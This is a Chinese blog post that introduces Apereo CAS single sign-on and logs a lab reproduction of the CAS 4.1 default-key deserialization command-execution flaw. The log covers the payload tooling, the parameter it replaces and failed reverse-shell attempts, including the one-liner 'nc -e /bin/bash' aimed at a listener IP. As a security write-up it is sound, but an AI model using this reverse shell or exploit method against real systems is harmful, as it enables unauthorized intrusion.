Apereo CAS

原创 于 2025-06-04 11:44:52 发布 · 620 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#威胁分析 #安全

目录

Apereo CAS是什么?

Apereo CAS4.1反序列化命令执行漏洞

Apereo CAS是什么?

        Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)解决方案,用于统一管理用户身份认证。它为web应用程序提供了集中式认证服务,使用户在多个应用系统只需登录一次,从而避免多次输入用户名和密码。

主要功能:

  • 单点登录(SSO):允许用户通过一次身份验证访问多个应用程序和服务,减少密码管理负担。
  • 支持多种认证协议:包括 CAS 协议、SAML、OAuth、OpenID 等,适应不同的认证需求。
  • 灵活的集成:可以与各种应用程序和服务(如 Web 应用、桌面应用和移动应用)进行集成。
  • 高安全性:支持多种认证方式(如双因素认证、LDAP 集成、OAuth2 等),并提供安全的令牌交换机制。
  • 扩展性:Apereo CAS 提供了丰富的插件和扩展功能,可以根据组织需求进行定制。

应用场景:

  • 企业内部应用:为企业的多个内部应用提供统一的身份认证服务,简化用户管理。
  • 教育机构:为学校或大学的教学管理系统、图书馆系统等提供单点登录解决方案。
  • 政府与大规模系统:为政府部门或大型机构的多种应用提供安全的身份认证。

优势:

  • 简化用户体验:减少了登录过程中的繁琐步骤,提高用户体验。
  • 提高安全性:通过集中式管理认证,降低安全漏洞的风险,特别是在使用多因素认证时。
  • 支持广泛的协议:适应不同的应用环境和技术栈,使得系统集成更加灵活

Apereo CAS4.1反序列化命令执行漏洞

        漏洞成因:存在默认密钥,通过默认密钥构造payload,触发反序列化漏洞。

版本要求:Apereo CAS < 4.1.7

账号要求:无

步骤1:抓取登录数据包

步骤2:利用ysoserial生成payload,这里发现生成的仅仅是普通的反序列化流,没有特定的CAS结构,成功不了。还是得用Apereo-CAS-Attack。

步骤3:替换execution参数为payload

验证结果

步骤4: 更换反向shell,测试

失败,硬编码可能不行,base64编码后测试

 失败,编码后不行,难道是权限不够?测试如下

失败,没有成功生成该文件,为什么?

 继续测试

确定命令正确

 查看结果

 命令是 touch  /tmp/test;id >> /tmp/test。

结果是生成了test文件,'test;id'文件,这条命令显然是没有把“分号”当做分隔符,而是当做了文件名的一部分。

看了其他文章,发现命令写错了,正常的是:

再测试:

不行,监听没有反应,反弹不回来,但是测试payload是正确的,结果如下:

 换一个payload,用"nc -e /bin/bash 192.168.23.133 9999"测试

依然是没有反应,问题可能需要一点时间分析底层原理。后续找到在修改。 

apereo cas开发_统一认证 - Apereo CAS 客户端的集成以及小结
weixin_39579468的博客
12-22 1224
前两篇介绍了Apereo CAS以及服务器端的安装,但还不够完整,服务端还没有Application真正用起来呢!这篇文章将介绍怎么用起来集成的目的客户端我们想要与Apereo CAS做什么集成呢?回顾一下Apereo CAS是做什么的?Apereo CAS的一个功能就是单点登录,统一的登录登出接口与页面,让系统中的模块只需要关注在业务点,而把安全认证的功能交给统一认证来做。所以客户端的集成主要是...
cas服务搭建
JL
01-19 712
目录一、概要二、版本三、搭建方式四、源码下载五、构建启动六、总结 一、概要 Apereo Cas是目前Java环境下使用比较广泛的单点登录系统,因此学习使用cas来搭建单点登录系统是很有必要的。基于cas开发一套企业的单点登录系统前,需要先完成cas的骨架搭建,这也是本文档要对搭建过程进行的一个详细说明。 二、版本 cas版本主要分为4.x.x、5.x.x以及6.x.x,关于版本如何选择,具体还是要了解每个版本主要的变化。但是有些重要的地方需要关注的,比如5.x.x版本使用maven来管理依赖,以及java
Apereo CAS5.2.3 自定义登录页,验证码,扩展开发,注册功能
04-25
完整项目在https://download.csdn.net/download/u010588262/10327539 这个资源是新增功能之后的main文件夹 对应博客系列:https://blog.csdn.net/u010588262/article/category/7548325 对应博客这篇:https://blog.csdn.net/u010588262/article/details/80014083
统一认证 - Apereo CAS 简介
weixin_34392906的博客
02-03 315
为什么要做这个尝试? 微服之道,方兴未艾;农之来学者,盖已千者! 这句是从《陶山集·太学案问》瞎改出来的。意思就是微服务的架构理念还在不断地发展,现在整个啥都 言必出微服务,差点都到了 没学过微服务的码农不是一个好码农。搞到微服务这个词都快跟区块链差不多臭了。 在将臭未臭之前,我们赶紧把其中的统一认证这块过一下。 在微服务的概念中,恨不...
统一认证 - Apereo CAS 小试
weixin_33878457的博客
02-17 195
上一篇文章我们对Apereo CAS有了简要的了解,这篇文章我们将动手练习Apereo CAS。主要是CAS单机版的搭设,用户信息存储到数据库,以及dashboard的使用做这些尝试的时候,Apereo CAS比较稳定的版本是5.3.x,使用如果想按照这个文章搭设的话,最好采用相同的版本 Apereo CAS单机版的搭设 Apereo ...
apereo-cas
m0_49420271的博客
06-08 329
vulhub-apereo-cas漏洞复现
apereo cas6.3.2可执行war,集成mysql的jdbc认证模块
03-28
Apereo CAS 6.3.2 是一个广泛使用的开源单点登录(Single Sign-On, SSO)服务器,基于 Java 技术栈构建,特别适用于教育和企业环境。它提供了安全的身份验证和授权服务,允许用户通过单一登录界面访问多个应用程序。...
cas-security-spring-boot-starter:用于Apereo CAS客户端的Spring Boot Starter与Spring Security完全集成
01-30
Spring Security CAS启动器 一个Spring Boot Starter,它将帮助您在应用程序安全上下文中配置 。 产品特点 Spring Boot 1和2支持 配置CAS身份验证和授权 支持基于当前HttpServletRequest动态服务解析 通过高级配置 ...
cas-management-overlay:Apereo CAS Management Web应用程序的WAR叠加
02-04
Cas-management-overlay 是一个针对 Apereo CAS(Central Authentication Service)管理Web应用程序的WAR(Web Application Archive)叠加项目。Apereo CAS 是一个开源的身份验证系统,它提供了单点登录(Single ...
单点登录Apereo CAS 7.1客户端集成教程
益添的博客
10-10 1579
本篇我们将开始对客户端进行集成。CAS中的客户端,就是指我们实际开发的各个需要登录认证的应用。现在,跟着笔者的步伐,一起探索如何集成CAS的认证吧。
CASApereo CAS 简介(一)
diandiao3845的博客
03-27 855
CASApereo CAS 简介(一) Background(背景) 随着公司业务的不断扩展,后台接入子系统不断增多,那么我们将针对不同的平台进行拆分为各自对应的子系统, 权限是不变的,那么我们不能每个子系统都单独进行登录认证,不然管理人员进行切换系统时会疯掉。 那么,经过考察选用开源框架 Apereo CAS , 选定版本为 5.2.0。目前系统已在线,并已稳定。 接下来我会将系...
Apereo CAS简单使用
2401_85480529的博客
07-24 978
Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)解决方案,旨在为各种应用程序提供集中化的身份验证服务。当用户在CAS服务器上成功登录后,他们将被重定向回这个URL,从而完成身份验证过程并允许用户访问受保护的资源。CAS Server URL指的是CAS服务器的地址,它是用于处理身份验证请求的中心服务器的URL。Application Service URL指的是应用程序服务的URL,即用户登录后的重定向地址。
Apereo CAS:全方位的企业级单点登录解决方案
最新发布
gitblog_01219的博客
10-18 1082
Apereo CAS:全方位的企业级单点登录解决方案 【免费下载链接】cas Apereo CAS - Identity & Single Sign On for all earthlings and beyond. 项目地址: ...
【亲测免费】 Apereo CAS 教程
gitblog_00554的博客
08-08 1064
Apereo CAS 教程 【免费下载链接】cas Apereo CAS - Identity & Single Sign On for all earthlings and beyond. 项目地址: https://gitco...
Apereo CAS 爬坑
cpongo5
11-18 805
心血来潮想给公司搭个单点登录系统,毕竟内网这么多系统,每个系统都一套账号密码,这样好low。CAS提供了一个统一认证服务,所有系统直接向CAS去请求登陆认证,而用户只在CAS登陆一次就够了,在大一点的公司里基本都有这种服务,叫SSO(Single sign-on)。 找了找开源的SSO,看到了CAS,感觉挺屌的,一直在更新,就他了。然后就开始爬坑了,记录一...
Apereo Cas在项目中接入
qq_32323239的博客
12-16 2201
Apereo CAS的一个功能就是单点登录,统一的登录登出接口与页面,让系统中的模块只需要关注在业务点,而把安全认证的功能交给统一认证来做。所以客户端的集成主要是单点登录的集成,客户端指定需要做安全认证的页面,然后Apereo CAS安全包检测校验用户登录情况,并自动与CAS登录页面进行跳转交互。1、用户访问CAS Client请求资源2、客户端程序做了重定向,重定向到CAS Server。
apereo cas开发_CASApereo CAS 简介(一)
weixin_39557583的博客
12-22 1313
CASApereo CAS 简介(一)Background(背景)随着公司业务的不断扩展,后台接入子系统不断增多,那么我们将针对不同的平台进行拆分为各自对应的子系统,权限是不变的,那么我们不能每个子系统都单独进行登录认证,不然管理人员进行切换系统时会疯掉。那么,经过考察选用开源框架 Apereo CAS , 选定版本为 5.2.0。目前系统已在线,并已稳定。接下来我会将系统进行脱敏整理出一套...
Apereo CAS 5.0.X 简明实用教程
热门推荐
来啊 快活啊
03-07 1万+
Apereo CAS 5.0.X 启用OAuth2服务时的一个坑
史上最详细的 Apereo CAS 5.3开发教程:四、CAS 定制化必须明白Spring Boot自动加载的原理
二总的猫
03-30 8053
Apereo CAS 5.3 项目源码地址:https://github.com/apereo CAS 系列详解:https://blog.csdn.net/makyan/column/info/36060 上一节内容:https://blog.csdn.net/makyan/article/details/88907349 本节继上一节内容讲解 四、Spring Boot自动加载的原理 在讲解C...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值